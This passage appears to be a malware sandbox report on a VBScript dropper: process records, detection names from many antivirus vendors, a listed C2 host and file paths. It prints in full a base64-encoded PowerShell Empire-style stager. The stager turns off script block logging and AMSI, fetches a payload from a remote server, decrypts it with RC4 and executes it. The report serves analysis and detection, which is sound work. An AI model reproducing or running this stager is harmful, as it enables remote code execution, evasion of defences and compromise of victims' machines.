EEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= | ||||||
parent_process | wscript.exe | martian_process | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABDADYANwA9AFsAcgBFAEYAXQAuAEEAcwBTAGUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABjADYANwApAHsAJAA2AGMANAA9ACQAYwA2ADcALgBHAGUAVABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQANgBjADQAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA2AEMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA2AGMANABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAQQBsAD0AWwBDAE8AbABsAEUAYwB0AEkAbwBOAHMALgBHAGUAbgBFAFIASQBjAC4ARABJAEMAVABpAG8AbgBBAHIAWQBbAHMAVABSAGkATgBnACwAUwB5AFMAdABFAG0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA2AGMANABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABTAGUAewBbAFMAQwBSAEkAcABUAEIAbABvAGMASwBdAC4AIgBHAEUAVABGAEkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAEwAdQBFACgAJABOAFUAbABMACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABpAE8AbgBTAC4ARwBFAG4AZQBSAGkAQwAuAEgAYQBTAEgAUwBFAHQAWwBzAFQAcgBpAG4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIARQBmAF0ALgBBAHMAUwBFAG0AQgBMAFkALgBHAEUAdABUAFkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQBUAEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBBAEwAVQBFACgAJABuAHUAbABMACwAJAB0AFIAVQBFACkAOwB9ADsAWwBTAHkAUwBUAEUATQAuAE4ARQBUAC4AUwBlAFIAdgBpAEMARQBQAE8AaQBuAFQATQBBAG4AYQBHAEUAcgBdADoAOgBFAFgAcABlAGMAVAAxADAAMABDAE8ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= |
option | -nop | value | Does not load current user profile | ||||||
option | -nop | value | Does not load current user profile |
dead_host | 193.117.208.148:7800 |
Lionic | Trojan.Script.Generic.4!c |
CAT-QuickHeal | Script.Trojan.39876 |
McAfee | PS/Dropper.f |
ALYac | GT:VB.Laburrak.14.29C080A2 |
VIPRE | GT:VB.Laburrak.14.29C080A2 |
Sangfor | Malware.Generic-VBS.Save.f99adb70 |
Arcabit | GT:VB.Laburrak.14.29C080A2 |
Symantec | Trojan.Malscript!gen8 |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.ABM |
Avast | VBS:Downloader-AXD [Trj] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan.PowerShell.Generic |
BitDefender | GT:VB.Laburrak.14.29C080A2 |
NANO-Antivirus | Trojan.Script.Downloader.inbiqr |
MicroWorld-eScan | GT:VB.Laburrak.14.29C080A2 |
Emsisoft | GT:VB.Laburrak.14.29C080A2 (B) |
F-Secure | Malware.VBS/PSRunner.VPSV |
McAfee-GW-Edition | PS/Dropper.f |
FireEye | GT:VB.Laburrak.14.29C080A2 |
Sophos | ATK/Empire-U |
Ikarus | Trojan-Downloader.PowerShell.Agent |
Avira | VBS/PSRunner.VPSV |
Xcitium | TrojWare.Win32.BadShell.XSN@7pmib7 |
Microsoft | VirTool:PowerShell/Empire.gen!A |
ZoneAlarm | HEUR:Trojan.PowerShell.Generic |
GData | GT:VB.Laburrak.14.29C080A2 |
Detected | |
AhnLab-V3 | Powershell/Downloader.S5 |
Tencent | Heur:Trojan.Powershell.Generic.u |
MAX | malware (ai score=87) |
Fortinet | PowerShell/Agent.AN!tr |
AVG | VBS:Downloader-AXD [Trj] |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |